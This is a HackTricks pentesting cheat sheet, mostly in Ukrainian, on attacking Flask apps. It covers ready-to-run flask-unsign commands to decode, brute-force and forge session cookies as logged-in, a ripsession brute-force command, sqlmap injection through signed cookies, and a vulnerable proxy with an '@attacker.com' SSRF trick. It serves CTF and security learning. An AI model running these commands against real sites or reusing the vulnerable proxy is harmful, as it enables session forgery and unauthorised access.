Flask

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Use Trickest to easily build and automate workflows powered by the world's most advanced community tools. Get Access Today:

Automate OffSec, EASM, and Custom Security Processes | Trickest

Можливо, якщо ви граєте в CTF, додаток Flask буде пов'язаний з SSTI.

Cookies

Ім'я сесії за замовчуванням для cookie - session.

Decoder

Онлайн декодер cookie Flask: https://www.kirsle.net/wizards/flask-session.cgi

Manual

Отримайте першу частину cookie до першої крапки та декодуйте її в Base64.

echo "ImhlbGxvIg" | base64 -d

The cookie також підписується за допомогою пароля

Flask-Unsign

Командний рядок для отримання, декодування, брутфорсу та створення сесійних куків Flask-додатку шляхом вгадування секретних ключів.

flask-unsignPyPI

pip3 install flask-unsign

flask-unsign --decode --cookie 'eyJsb2dnZWRfaW4iOmZhbHNlfQ.XDuWxQ.E2Pyb6x3w-NODuflHoGnZOEpbH8'

Брутфорс

flask-unsign --wordlist /usr/share/wordlists/rockyou.txt --unsign --cookie '<cookie>' --no-literal-eval

Підписування

flask-unsign --sign --cookie "{'logged_in': True}" --secret 'CHANGEME'

Підписування за допомогою застарілих (старих версій)

flask-unsign --sign --cookie "{'logged_in': True}" --secret 'CHANGEME' --legacy

RIPsession

Командний рядок для брутфорсу вебсайтів, використовуючи куки, створені за допомогою flask-unsign.

GitHub - Tagvi/ripsession: A command line tool to brute-force websites using cookies crafted with flask-unsign.GitHub

ripsession -u 10.10.11.100 -c "{'logged_in': True, 'username': 'changeMe'}" -s password123 -f "user doesn't exist" -w wordlist.txt

SQLi в Flask сесійних куках з SQLmap

Цей приклад використовує опцію sqlmap eval для автоматичного підписування payload'ів sqlmap для flask, використовуючи відомий секрет.

Flask проксі для SSRF

У цьому звіті пояснюється, як Flask дозволяє запит, що починається з символу "@":

GET @/ HTTP/1.1
Host: target.com
Connection: close

Який з наведених сценаріїв:

from flask import Flask
from requests import get

app = Flask('__main__')
SITE_NAME = 'https://google.com/'

@app.route('/', defaults={'path': ''})
@app.route('/<path:path>')
def proxy(path):
return get(f'{SITE_NAME}{path}').content

app.run(host='0.0.0.0', port=8080)

Може дозволити ввести щось на кшталт "@attacker.com", щоб викликати SSRF.

Використовуйте Trickest, щоб легко створювати та автоматизувати робочі процеси, підтримувані найсучаснішими інструментами спільноти. Отримайте доступ сьогодні:

Automate OffSec, EASM, and Custom Security Processes | Trickest

Вчіться та практикуйте Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE) Вчіться та практикуйте Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE)

Підтримайте HackTricks

Перевірте плани підписки!
Приєднуйтесь до 💬 групи Discord або групи Telegram або слідкуйте за нами в Twitter 🐦 @hacktricks_live.
Діліться хакерськими трюками, надсилаючи PR до HackTricks та HackTricks Cloud репозиторіїв на GitHub.

PreviousElectron contextIsolation RCE via IPC NextNodeJS Express

Last updated 1 month ago